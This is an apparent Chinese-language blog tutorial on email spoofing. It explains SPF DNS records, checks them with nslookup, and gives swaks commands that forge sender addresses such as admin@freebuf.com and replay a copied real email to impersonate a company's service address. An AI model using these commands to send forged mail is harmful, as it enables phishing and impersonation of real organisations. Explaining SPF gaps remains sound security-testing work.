之前看了下郵件偽造覺(jué)得挺有意思的锈拨,所以看了下郵件偽造的東西肩碟,下面簡(jiǎn)單的總結(jié)了一下蔫缸,如果有不妥的地方還望大佬們提出來(lái)刨疼。
1. 什么是SPF
SPF是 Sender Policy Framework 的縮寫(xiě),一種以IP地址認(rèn)證電子郵件發(fā)件人身份的技術(shù)瘪板,是為了防范垃圾郵件而提出來(lái)的一種DNS記錄類(lèi)型吴趴,它是一種TXT類(lèi)型的記錄漆诽。 接收郵件方會(huì)首先檢查域名的SPF記錄侮攀,來(lái)確定發(fā)件人的IP地址是否被包含在SPF記錄里面,如果在厢拭,就認(rèn)為是一封正確的郵件兰英,否則會(huì)認(rèn)為是一封偽造的郵件進(jìn)行退回。
SPF可以防止別人偽造你來(lái)發(fā)郵件供鸠,是一個(gè)反偽造性郵件的解決方案畦贸。當(dāng)你定義了你域名的SPF記錄之后, 接收郵件方會(huì)根據(jù)你的SPF記錄來(lái)確定連接過(guò)來(lái)的IP地址是否被包含在SPF記錄里面楞捂,如果在薄坏,則認(rèn)為是一封正確的郵件,否則則認(rèn)為是一封偽造的郵件寨闹。
設(shè)置正確的 SPF 記錄可以提高郵件系統(tǒng)發(fā)送外域郵件的成功率胶坠,也可以一定程度上防止別人假冒你的域名發(fā)郵件。
2. 測(cè)試方法
1. Windows下
nslookup -type=txt ***.com
- 不存在漏洞的情況:
- 存在漏洞的情況:
2. Linux下
- 不存在漏洞的情況:
- 存在漏洞的情況:
3. 利用方法
1. Swaks介紹
Swaks是SWiss Army Knife Smtp的縮寫(xiě)繁堡,由John Jetmore編寫(xiě)和維護(hù)的一種功能強(qiáng)大沈善,靈活乡数,可腳本化,面向事務(wù)的SMTP測(cè)試工具闻牡【桓埃可向任意目標(biāo)發(fā)送任意內(nèi)容的郵件。
Kali中是自帶的罩润,也可以在作者官網(wǎng)下載
2. 基本用法
-- to <收件人的郵箱>
-- from <要顯示的發(fā)件人郵箱>
-- ehlo <偽造的郵件ehlo頭>
-- body <郵件正文>
-- header <郵件頭信息玖翅,subject為郵件標(biāo)題>
3. 使用方法
- SPF配置好的情況
root@kali:~# swaks --to xxxxxxxxx@qq.com --from admin@qq.com --ehlo qq.com --body hello --header "Subject: hello"
- SPF未配置的情況
root@kali:~# swaks --to xxxxxxxxx@qq.com --from admin@freebuf.com --ehlo csdn.com --body hello --header "Subject: hello"
在你ip沒(méi)有被qq郵箱band的情況下,郵件可以正常發(fā)送哨啃,返回250 OK烧栋。
4. 高級(jí)用法
使用swaks還可以進(jìn)行高級(jí)的郵件偽造,使用--data參數(shù)
--data <源郵件>
首先需要找一份正常的郵件拳球,顯示郵件原文审姓,復(fù)制內(nèi)容保存為一個(gè)txt文件。原文中的received可以刪除祝峻,該項(xiàng)為接收信息魔吐,發(fā)信中是不需要。to也可以刪除莱找,可以直接使用swaks --to來(lái)代替酬姆。最后不要忘了加--from 否則qq郵箱會(huì)報(bào)由kali代發(fā)的。
swaks --data ./Desktop/email.txt --to xxxxxxxxx@qq.com --from xxx@admin.com
遇到郵件偽造的例子了奥溺,直接貼圖
這個(gè)發(fā)送的邀請(qǐng)郵件只能登錄第三方郵箱發(fā)送辞色,但是我們?cè)趥卧斓臅r(shí)候并不影響,查看郵件原文浮定,按照上面的步驟
root@kali:~# swaks --data ./桌面/email.txt --to 8xxxx2@qq.com --from service@fxxxxxe.com(這里面的xxx全是遮掩了的)
